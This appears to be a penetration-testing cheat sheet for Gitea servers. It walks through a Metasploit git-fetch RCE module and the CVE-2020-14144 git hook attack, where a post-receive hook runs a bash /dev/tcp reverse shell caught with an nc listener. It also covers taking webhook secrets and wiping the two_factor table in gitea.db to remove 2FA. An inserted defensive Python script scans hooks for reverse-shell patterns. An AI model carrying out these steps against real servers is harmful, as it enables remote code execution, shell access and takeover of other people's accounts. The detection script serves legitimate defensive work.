Exploit Notes

Gitea Pentesting

Last modified: 2023-03-18


Gitea is a forge software package for hosting software development version control using Git.

Common Directories


# OAuth


Get Secrets in Web Hooks

In an existing repository, we may find the webhook secret value under the repository → Settings → Web Hooks.

Git Fetch Remote Code Execution (RCE)


msf> use exploit/multi/http/gitea_git_fetch_rce
msf> (set options)
msf> run

Git Hooks Remote Code Execution (RCE)

This is CVE-2020-14144.

1. Login

Access the Gitea dashboard and log in with an existing account.

2. Create a New Repository

3. Go to the Repository’s Settings

In the new repository we’ve created, go to Settings → Git Hooks → post-receive.

4. Update to the Reverse Shell Payload

In the post-receive edit page, inject the payload as below:


bash -i >& /dev/tcp/

5. Start Listener in Terminal

To receive the outgoing connection from the git hook, start a listener.

nc -lvnp 4444

6. Create the New Repository in Terminal

mkdir test
cd test
touch README.md
git init
git add README.md
git commit -m "first commit"
git remote add origin https://<target-ip>/<username>/test.git
git push -u origin master

After the push, the git hook is triggered and executes the reverse shell command.
Now we should get a shell.
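A defender-side check for the hook abuse described in the steps above, as an added example that is not part of the original notes: it reads `DISABLE_GIT_HOOKS` from the `[security]` section of `app.ini` and scans web-editable hook scripts for shell-callback patterns such as the `/dev/tcp/` redirect. The `<owner>/<repo>.git/hooks/<hook>.d/<hook>` layout, the pattern list, and all sample paths and file contents are assumptions constructed for the demonstration.

```python
import configparser
import re
import tempfile
from pathlib import Path

# Assumed indicator list; /dev/tcp/ is the redirect used in the payload above.
SUSPICIOUS = re.compile(r"/dev/tcp/|\bmkfifo\b|\bnc\b.*\s-e\b")
HOOKS = ("pre-receive", "update", "post-receive")

def git_hooks_disabled(app_ini: Path) -> bool:
    """True only when [security] DISABLE_GIT_HOOKS is explicitly true."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    # app.ini may start with keys outside any section; park them in a dummy one.
    cp.read_string("[_top]\n" + app_ini.read_text())
    # A missing key returns False so the version default gets checked by hand.
    return cp.getboolean("security", "DISABLE_GIT_HOOKS", fallback=False)

def scan_hooks(repo_root: Path):
    """Return (hook path, line number, line) for each suspicious hook line."""
    hits = []
    for name in HOOKS:
        # Assumed layout: <owner>/<repo>.git/hooks/<hook>.d/<hook>
        for hook in sorted(repo_root.glob(f"*/*.git/hooks/{name}.d/{name}")):
            for n, line in enumerate(hook.read_text(errors="replace").splitlines(), 1):
                if SUSPICIOUS.search(line):
                    hits.append((hook.relative_to(repo_root).as_posix(), n, line.strip()))
    return hits

def demo():
    """Audit a constructed repository tree and a constructed app.ini."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        bad = root / "repos/alice/test.git/hooks/post-receive.d"
        ok = root / "repos/bob/site.git/hooks/post-receive.d"
        for d in (bad, ok):
            d.mkdir(parents=True)
        # Constructed samples; the first mirrors the truncated payload above.
        (bad / "post-receive").write_text("#!/bin/bash\nbash -i >& /dev/tcp/<redacted>\n")
        (ok / "post-receive").write_text("#!/bin/sh\necho 'deploy queued'\n")
        ini = root / "app.ini"
        ini.write_text("APP_NAME = Gitea\n[security]\nDISABLE_GIT_HOOKS = false\n")
        return git_hooks_disabled(ini), scan_hooks(root / "repos")

if __name__ == "__main__":
    disabled, hits = demo()
    print("git hooks disabled:", disabled)
    for path, n, line in hits:
        print(f"{path}:{n}: {line}")
```

On a real server, point `git_hooks_disabled` at the instance's `app.ini` and `scan_hooks` at its repository root; a hit is a lead for review, not proof of compromise.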

Swagger API

We can access /api/swagger to interact with the Swagger API.

Get New Token & Authorize

We need a token to use the Swagger API.

  1. Register a new account on the Gitea top page.
  2. Go to /user/settings/applications and generate a new token.
  3. Copy the token value e.g. “fa2c2428817d64c1b890d404a905f7be2ffd4bde”.
  4. Go to /api/swagger.
  5. Click the “Authorize” button. The modal window opens.
  6. Paste the token in the “Token” section.

Delete the Two-Factor

victim@machine:/gitea/gitea$ python3

>>> import sqlite3
>>> conn=sqlite3.connect('gitea.db')
>>> conn.execute('delete from two_factor')
>>> conn.commit()
>>> conn.close()
